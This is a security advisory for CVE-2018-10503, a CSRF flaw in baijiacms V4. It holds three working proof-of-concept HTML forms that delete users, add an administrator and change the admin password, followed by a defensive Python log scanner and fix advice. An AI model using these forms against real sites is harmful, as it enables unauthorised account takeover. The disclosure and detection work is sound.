Baijiacms V4 v4_1_4_20170105 CVE-2018-10503 – CSRF

Authors: monburan    Risk: High

CVE: CVE-2018-10503    0day: Cross-site request forgery

0day-id: 0DAY-176114    Date: 2018-04-28

Summary

An issue was discovered in index.php in baijiacms V4 v4_1_4_20170105. CSRF allows adding an administrator account via op=edituser, changing the administrator password via op=changepwd, or deleting an account via op=deleteuser.

POC

Delete any user

<html>
<body>
    <script>
        history.pushState('', '', '/')
    </script>
    <form action="http://localhost/index.php">
        <input type="hidden" name="mod" value="site" />
        <input type="hidden" name="op" value="deleteuser" />
        <input type="hidden" name="id" value="3" />
        <!-- delete the user with this id -->
        <input type="hidden" name="act" value="manager" />
        <input type="hidden" name="do" value="user" />
        <input type="hidden" name="beid" value="1" />
        <input type="submit" value="Submit request" />
    </form>
</body>
</html>

Add a user (admin)

<html>
<body>
    <script>
        history.pushState('', '', '/')
    </script>
    <form action="http://localhost/index.php?mod=site&op=edituser&act=manager&do=user&beid=1" method="POST">
        <input type="hidden" name="id" value="" />
        <input type="hidden" name="is&#95;admin" value="1" />
        <!-- add an admin -->
        <input type="hidden" name="store" value="0" />
        <input type="hidden" name="username" value="tester1" />
        <input type="hidden" name="newpassword" value="123456" />
        <input type="hidden" name="confirmpassword" value="123456" />
        <input type="hidden" name="submit" value="%E6%8F%90%E4%BA%A4" />
        <input type="submit" value="Submit request" />
    </form>
</body>
</html>

Change the admin password

<html>
<body>
    <script>
        history.pushState('', '', '/')
    </script>
    <form action="http://localhost/index.php?mod=site&op=changepwd&id=1&act=manager&do=user&beid=1" method="POST">
        <input type="hidden" name="username" value="admin" />
        <!-- only the username is used -->
        <input type="hidden" name="newpassword" value="12345678" />
        <input type="hidden" name="confirmpassword" value="12345678" />
        <input type="hidden" name="submit" value="%E6%8F%90%E4%BA%A4" />
        <input type="submit" value="Submit request" />
    </form>
</body>
</html>

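As an added defensive example (not part of this advisory or of baijiacms), the Python check below scans web-server access log lines for the three operations named above and flags a deleteuser reached via GET, or an edituser/changepwd POST whose Referer is absent or from a host other than the site; the log format, hostnames and sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# State-changing operations on index.php named in the advisory.
SENSITIVE_OPS = {"edituser", "changepwd", "deleteuser"}

# Combined log format with a trailing Referer field (constructed for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) '
    r'(?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "(?P<referer>[^"]*)"'
)

def classify(line, site_host="localhost"):
    """Return a finding string for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["path"])
    if not url.path.endswith("/index.php"):
        return None
    op = parse_qs(url.query).get("op", [None])[0]
    if op not in SENSITIVE_OPS:
        return None
    # A deletion triggered by a plain GET is reachable from any <form> or <img>.
    if m["method"] == "GET":
        return f"{m['ip']} op={op} via GET (state change on a GET request)"
    # A missing Referer is also flagged; clients with a strict Referrer-Policy
    # will show up here as false positives, so review rather than auto-block.
    referer_host = urlsplit(m["referer"]).hostname if m["referer"] != "-" else None
    if referer_host != site_host:
        return f"{m['ip']} op={op} POST with referer {m['referer']!r} (not {site_host})"
    return None

def scan(lines, site_host="localhost"):
    """Run classify() over every line and keep only the findings."""
    return [f for f in (classify(l, site_host) for l in lines) if f]

# Constructed sample log: lines 1, 2 and 5 are cross-site; 3 and 4 are legitimate.
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Apr/2018:10:00:01 +0000] "GET /index.php?mod=site&op=deleteuser&id=3&act=manager&do=user&beid=1 HTTP/1.1" 302 0 "http://attacker.example/"',
    '203.0.113.5 - - [28/Apr/2018:10:00:02 +0000] "POST /index.php?mod=site&op=edituser&act=manager&do=user&beid=1 HTTP/1.1" 200 512 "http://attacker.example/"',
    '198.51.100.7 - - [28/Apr/2018:10:01:00 +0000] "POST /index.php?mod=site&op=changepwd&id=1&act=manager&do=user&beid=1 HTTP/1.1" 200 512 "http://localhost/index.php?mod=site&act=manager&do=user"',
    '198.51.100.7 - - [28/Apr/2018:10:01:05 +0000] "GET /index.php?mod=site&act=manager&do=user HTTP/1.1" 200 2048 "-"',
    '203.0.113.5 - - [28/Apr/2018:10:02:00 +0000] "POST /index.php?mod=site&op=changepwd&id=1&act=manager&do=user&beid=1 HTTP/1.1" 200 512 "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The check only uses method, path and Referer, so it cannot see POST bodies; the durable fix is a per-session CSRF token verified by the edituser, changepwd and deleteuser handlers.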